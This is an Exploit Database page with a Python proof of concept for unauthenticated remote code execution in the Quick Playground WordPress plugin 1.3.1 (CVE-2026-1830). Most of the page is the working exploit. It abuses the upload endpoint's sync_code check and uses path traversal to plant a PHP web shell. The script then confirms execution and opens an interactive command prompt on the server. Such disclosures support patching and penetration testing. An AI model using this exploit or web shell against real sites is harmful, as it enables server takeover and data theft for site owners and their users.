This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING Quick Playground for WordPress 1.3.1 - Unauthenticated Remote Code Execution EDB-ID: 52596 CVE: 2026-1830 EDB Verified: Author: CARDOSOURCE Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-05-29 Vulnerable App: # Exploit Title: Quick Playground for WordPress 1.3.1 - Unauthenticated Remote Code Execution # Google Dork: N/A # Date: 2026-05-22 # Exploit Author: cardosource # Vendor Homepage: https://quickplayground.com # Software Link: https://downloads.wordpress.org/plugin/quick-playground.1.3.1.zip # Version: <= 1.3.1 # Tested on: Docker / Debian / Apache / PHP 8.2 / WordPress 6.x # CVE: CVE-2026-1830 # # Description: # # The Quick Playground plugin exposes a REST API endpoint: # # /wp-json/quickplayground/v1/upload_image/{profile} # # The endpoint validates uploads exclusively through a sync_code value # without requiring authenticated WordPress sessions or capability checks. # # Vulnerable code: # # if($code == $sync_code) # return true; # # If a valid sync_code is known, weak, reused, leaked, or predictable, # an attacker can upload arbitrary files using path traversal sequences. # # This PoC demonstrates arbitrary PHP file upload resulting in remote # command execution in a controlled local lab environment. # # LAB SETUP: # # docker exec -it <container> \ # wp option update qckply_sync_code_default 'exploit123' --allow-root # # Usage: # # python3 poc.py # import requests import base64 import random import string import re TARGET = "http://localhost:8080" SYNC_CODE = "exploit123" PROFILE = "default" s = requests.Session() s.headers.update({ "User-Agent": "Mozilla/5.0", "Content-Type": "application/json" }) name = ''.join(random.choices(string.ascii_lowercase, k=8)) + ".php" shell = b'<?php if(isset($_GET["cmd"])){echo "<pre>";system($_GET["cmd"]);echo "</pre>";} ?>' payload = { "sync_code": SYNC_CODE, "filename": f"../../../{name}", "base64": base64.b64encode(shell).decode() } url = f"{TARGET}/wp-json/quickplayground/v1/upload_image/{PROFILE}" print("[-] Sending webshell...") r = s.post(url, json=payload, timeout=15) try: msg = r.json().get("message", "") except: print("[-] Invalid server response") exit() if "saving to" not in msg: print("[-] Upload failed") print(r.text[:300]) exit() print("[-] Checking execution...") shell_url = f"{TARGET}/{name}" r = s.get(shell_url, params={"cmd": "id"}, timeout=10) m = re.search(r"<pre>(.*?)</pre>", r.text, re.DOTALL) if not m: print("[-] Shell not responding") exit() print("[+] RCE CONFIRMED!") print(f"[+] Shell: {shell_url}?cmd=command") print(f"[+] User: {m.group(1).strip()}\n") while True: cmd = input("$ ").strip() if cmd == "exit": break if not cmd: continue r = s.get(shell_url, params={"cmd": cmd}, timeout=30) m = re.search(r"<pre>(.*?)</pre>", r.text, re.DOTALL) if m: print(m.group(1).strip()) Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.